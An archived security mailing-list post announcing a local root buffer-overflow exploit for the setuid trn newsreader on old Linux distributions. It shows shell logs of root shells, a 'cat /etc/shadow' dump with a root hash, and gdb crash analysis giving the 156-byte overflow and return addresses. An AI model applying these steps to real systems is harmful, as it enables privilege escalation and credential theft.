lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <BAY18-F1580819117F440A622C5E6CF870@phx.gbl>
From: zzagorrzzagorr at hotmail.com (Z z a g o r R)
Subject: /usr/bin/trn local root exploit

/*
---------------------------------------
TEST MANDRAKE 9.2
sh-2.05b# cat /proc/version
Linux version 2.4.22-10mdk (nplanel@...mandrakesoft.com) (gcc version 3.3.1 
(Mandrake Linux 9.2 3.3.1-2mdk)) #1 Thu Sep 18 12:30:58 CEST 2003
sh-2.05b# rpm -qa trn
trn-3.6-17mdk
sh-2.05b# chmod +s /usr/bin/trn
chmod +s /usr/bin/trn
sh-2.05b#
sh-2.05b# ls -al /usr/bin/trn
ls -al /usr/bin/trn
-rwsr-sr-x    1 root     root       233624 Jan 10  2003 /usr/bin/trn
sh-2.05b# exit
sh-2.05b$ ./trn 0xbfffff96
sh-2.05b# id
uid=0(root) gid=4294967295 groups=4294967295
sh-2.05b#
sh-2.05b# cat /etc/shadow
cat /etc/shadow
root:$1$HC7/pHcz$L0w/RpmeVEF9Xbnf7iHjv/:12554:0:99999:7:::
....
---------------------------------------
TEST SLACKWARE 10.0.0(not suid)
bash-2.05b$ cat /etc/slackware-version
Slackware 10.0.0
bash-2.05b$ cat /proc/version
Linux version 2.4.26 (root@...t) (gcc version 3.3.4) #2 Mon Jun 14 19:05:05 
PDT 2004
bash-2.05b$ uname -a
Linux nyg 2.4.26 #2 Mon Jun 14 19:05:05 PDT 2004 i686 unknown unknown 
GNU/Linux
bash-2.05b$ ./a 0xbfffff98
sh-2.05b$
----------------------------------------
TEST SLACKWARE 9.1.0
sh-2.05b$ ./trn 0xbfffff84
./trn 0xbfffff84
sh-2.05b#
sh-2.05b# id
id
uid=0(root) gid=98(nobody) groups=98(nobody)
*/
/*
RETADDR?(mandrake...)
sh-2.05b$ gdb ./trn
gdb ./trn
GNU gdb 5.3-25mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...
(no debugging symbols found)...
(gdb)
(gdb) r `perl -e 'print "A" x 156'`     --------->BUFFER=>156
(gdb) r `perl -e 'print "A" x 156'`
Starting program: /usr/bin/trn `perl -e 'print "A" x 156'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x0805ad05 in strcpy ()
(gdb) i r
eax            0x0      0
ecx            0x8087244        134771268
edx            0xbffff850       -1073743792
ebx            0x41414141       1094795585
esp            0xbffff931       0xbffff931
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x805ad05        0x805ad05
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb) x/1000x $esp
0xbffff931:     0x2c080872      0x01bfffff      0x01000000      0x41000000
.
..
...
---Type <return> to continue, or q <return> to quit---
....
.....
......
---Type <return> to continue, or q <return> to quit---
.......
........
.........
---Type <return> to continue, or q <return> to quit---
..........
...........
............
---Type <return> to continue, or q <return> to quit---
0xbffffef1:     0x0effffff      0xff000000      0x0fffffff      0x1a000000
0xbfffff01:     0x00bfffff      0x00000000      0x00000000      0x00000000
0xbfffff11:     0x00000000      0x00000000      0x38366900      0x752f0036
0xbfffff21:     0x622f7273      0x742f6e69      0x41006e72      0x41414141
0xbfffff31:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff41:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff51:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff61:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff71:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff81:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff91:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffa1:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffb1:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffc1:     0x41414141      0x00414141      0x622f3d5f      0x732f6e69
0xbfffffd1:     0x57500068      0x752f3d44      0x622f7273      0x48006e69
0xbfffffe1:     0x3d454d4f      0x4853002f      0x3d4c564c      0x752f0031
0xbffffff1:     0x622f7273      0x742f6e69      0x00006e72      Cannot 
access memory at address 0xbffffffd
(gdb)
*/

_________________________________________________________________
En etkili ve güvenilir PC Korumayi tercih edin, rahat edin! 
http://www.msn.com.tr/security/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ